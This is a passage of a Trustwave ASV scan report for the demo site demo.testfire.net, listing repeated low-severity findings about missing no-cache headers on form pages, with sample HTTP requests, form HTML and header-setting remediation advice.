<input type="submit" value="Go">

Request: GET http://65.61.137.117:8080/ HTTP/1.1


Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

211 Absence of caching 2.1 Low Pass URL: https://demo.testfire.net:8443/


directives for pages having Port: tcp/8443
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https

Evidence:
DetectionDetails: Limit Exceeded. 5 more item(s) were reported.

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 551 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
response containing form.

212 Absence of caching 2.1 Low Pass URL: http://demo.testfire.net:8080/index.jsp


directives for pages having Port: tcp/8080
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http

Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://demo.testfire.net:8080/index.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

Request: GET http://demo.testfire.net:8080/index.jsp HTTP/1.1


Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=03939398EA63CCAEE93295DC28E42282

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 552 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

213 Absence of caching 2.1 Low Pass URL: https://65.61.137.117/index.jsp?content=personal.htm


directives for pages having Port: tcp/443
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https

Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://65.61.137.117/index.jsp?content=personal.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

Request: GET https://65.61.137.117/index.jsp?content=personal.htm


HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 553 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Cookie: JSESSIONID=3804E3482E26BDF0C73231467A2AC9D4

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

214 Absence of caching 2.1 Low Pass URL: https://65.61.137.117/


directives for pages having Port: tcp/443
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https

Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://65.61.137.117/
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

Request: GET https://65.61.137.117/ HTTP/1.1

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 554 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

215 Absence of caching 2.1 Low Pass URL: http://demo.testfire.net:8080/


directives for pages having Port: tcp/8080
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http

Evidence:
DetectionDetails: Limit Exceeded. 5 more item(s) were reported.

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 555 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

216 Absence of caching 2.1 Low Pass URL: http://65.61.137.117/index.jsp?content=inside_contact.htm


directives for pages having Port: tcp/80
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http

Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://65.61.137.117/index.jsp?content=inside_contact.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

Request: GET
http://65.61.137.117/index.jsp?content=inside_contact.htm HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=7DEA7694E36255C4C48824F9A0DE4E13

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 556 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

217 Absence of caching 2.1 Low Pass URL: http://65.61.137.117:8080/


directives for pages having Port: tcp/8080
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http

Evidence:
DetectionDetails: Limit Exceeded. 5 more item(s) were reported.

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

218 Absence of caching 2.1 Low Pass URL: https://demo.testfire.net/


directives for pages having Port: tcp/443
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 557 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Service: https

Evidence:
DetectionDetails: Limit Exceeded. 5 more item(s) were reported.

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

219 Absence of caching 2.1 Low Pass URL: http://65.61.137.117:8080/search.jsp?query=_WSETESTDATA


directives for pages having Port: tcp/8080
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http

Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://65.61.137.117:8080/search.jsp?query=_WSETESTDATA
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 558 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Request: GET
http://65.61.137.117:8080/search.jsp?query=_WSETESTDATA HTTP/1.1
Cookie: JSESSIONID=76AA5AC0228D700D9219ED73F9533B78
Upgrade-Insecure-Requests: 1
Referer: http://65.61.137.117:8080/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

220 Absence of caching 2.1 Low Pass URL: http://65.61.137.117:8080/index.jsp?content=business.htm


directives for pages having Port: tcp/8080
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http

Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://65.61.137.117:8080/index.jsp?content=business.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 559 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

Request: GET
http://65.61.137.117:8080/index.jsp?content=business.htm HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=76AA5AC0228D700D9219ED73F9533B78

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

221 Absence of caching 2.1 Low Pass URL: http://65.61.137.117:8080/sendFeedback


directives for pages having Port: tcp/8080
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http

Evidence:
DetectionDetails: Form Caching Vulnerability Found

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 560 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
POST - http://65.61.137.117:8080/sendFeedback
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

Request: POST http://65.61.137.117:8080/sendFeedback HTTP/1.1


Cookie: JSESSIONID=76AA5AC0228D700D9219ED73F9533B78
Origin: http://65.61.137.117:8080
Upgrade-Insecure-Requests: 1
Referer: http://65.61.137.117:8080/feedback.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Length: 126
Content-Type: application/x-www-form-urlencoded

cfile=comments.txt&name=CHSuser&email_addr=jsmith20%40kelev.b
iz&subject=_WSETESTDATA&comments=_WSETESTAREADATA&submit
=+Submit+

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

222 Absence of caching 2.1 Low Pass URL: https://65.61.137.117/sendFeedback


directives for pages having Port: tcp/443
forms
Data submitted via forms present on pages without caching directives,

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 561 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https

Evidence:
DetectionDetails: Form Caching Vulnerability Found
POST - https://65.61.137.117/sendFeedback
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

Request: POST https://65.61.137.117/sendFeedback HTTP/1.1


Cookie: JSESSIONID=3804E3482E26BDF0C73231467A2AC9D4
Origin: https://65.61.137.117
Upgrade-Insecure-Requests: 1
Referer: https://65.61.137.117/feedback.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Length: 126
Content-Type: application/x-www-form-urlencoded

cfile=comments.txt&name=CHSuser&email_addr=jsmith20%40kelev.b
iz&subject=_WSETESTDATA&comments=_WSETESTAREADATA&submit
=+Submit+

Remediation:

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 562 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

223 Absence of caching 2.1 Low Pass URL: https://65.61.137.117/search.jsp?query=_WSETESTDATA


directives for pages having Port: tcp/443
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https

Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://65.61.137.117/search.jsp?query=_WSETESTDATA
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

Request: GET https://65.61.137.117/search.jsp?query=_WSETESTDATA


HTTP/1.1
Cookie: JSESSIONID=3804E3482E26BDF0C73231467A2AC9D4
Upgrade-Insecure-Requests: 1
Referer: https://65.61.137.117/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 563 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

224 Absence of caching 2.1 Low Pass URL: https://65.61.137.117/login.jsp


directives for pages having Port: tcp/443
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https

Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://65.61.137.117/login.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

<form action="doLogin" method="post" name="login" id="login"

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 564 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
onsubmit="return (confirminput(login));">
<input type="text" id="uid" name="uid" value="" style="width:
150px;">
<input type="password" id="passw" name="passw" style="width:
150px;">
<input type="submit" name="btnSubmit" value="Login">

Request: GET https://65.61.137.117/login.jsp HTTP/1.1


Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=3804E3482E26BDF0C73231467A2AC9D4

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

225 Absence of caching 2.1 Low Pass URL: http://65.61.137.117/search.jsp?query=_WSETESTDATA


directives for pages having Port: tcp/80
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http

Evidence:

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 565 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
DetectionDetails: Form Caching Vulnerability Found
GET - http://65.61.137.117/search.jsp?query=_WSETESTDATA
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

Request: GET http://65.61.137.117/search.jsp?query=_WSETESTDATA


HTTP/1.1
Cookie: JSESSIONID=7DEA7694E36255C4C48824F9A0DE4E13
Upgrade-Insecure-Requests: 1
Referer: http://65.61.137.117/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

226 Absence of caching 2.1 Low Pass URL: https://demo.testfire.net/feedback.jsp


directives for pages having Port: tcp/443
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 566 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https

Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://demo.testfire.net/feedback.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

<form name="cmt" method="post" action="sendFeedback">


<input type="hidden" name="cfile" value="comments.txt">
<input name="name" size="25" type="text" value="">
<input name="email_addr" type="text" size="25">
<input name="subject" size="25">
<input type="submit" value=" Submit " name="submit">
<input type="reset" value=" Clear Form " name="reset">

Request: GET https://demo.testfire.net/feedback.jsp HTTP/1.1


Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=0565231311CE173563DB02789CEE78E3

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 567 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
response containing form.

227 Absence of caching 2.1 Low Pass URL: http://65.61.137.117:8080/index.jsp?content=personal.htm


directives for pages having Port: tcp/8080
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http

Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://65.61.137.117:8080/index.jsp?content=personal.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

Request: GET
http://65.61.137.117:8080/index.jsp?content=personal.htm HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=76AA5AC0228D700D9219ED73F9533B78

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 568 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

228 Absence of caching 2.1 Low Pass URL: http://demo.testfire.net:8080/index.jsp?content=inside_contac


directives for pages having t.htm
forms Port: tcp/8080

Data submitted via forms present on pages without caching directives,


can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http

Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET -
http://demo.testfire.net:8080/index.jsp?content=inside_contact.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

Request: GET
http://demo.testfire.net:8080/index.jsp?content=inside_contact.htm

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 569 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=03939398EA63CCAEE93295DC28E42282

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

229 Absence of caching 2.1 Low Pass URL: https://demo.testfire.net:8443/login.jsp


directives for pages having Port: tcp/8443
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https

Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://demo.testfire.net:8443/login.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 570 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<input type="submit" value="Go">

<form action="doLogin" method="post" name="login" id="login"


onsubmit="return (confirminput(login));">
<input type="text" id="uid" name="uid" value="" style="width:
150px;">
<input type="password" id="passw" name="passw" style="width:
150px;">
<input type="submit" name="btnSubmit" value="Login">

Request: GET https://demo.testfire.net:8443/login.jsp HTTP/1.1


Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=44C815873649B1433E310F19F9B9450B

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

230 Absence of caching 2.1 Low Pass URL: https://demo.testfire.net:8443/index.jsp


directives for pages having Port: tcp/8443
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 571 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Service: https

Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://demo.testfire.net:8443/index.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

Request: GET https://demo.testfire.net:8443/index.jsp HTTP/1.1


Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=44C815873649B1433E310F19F9B9450B

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

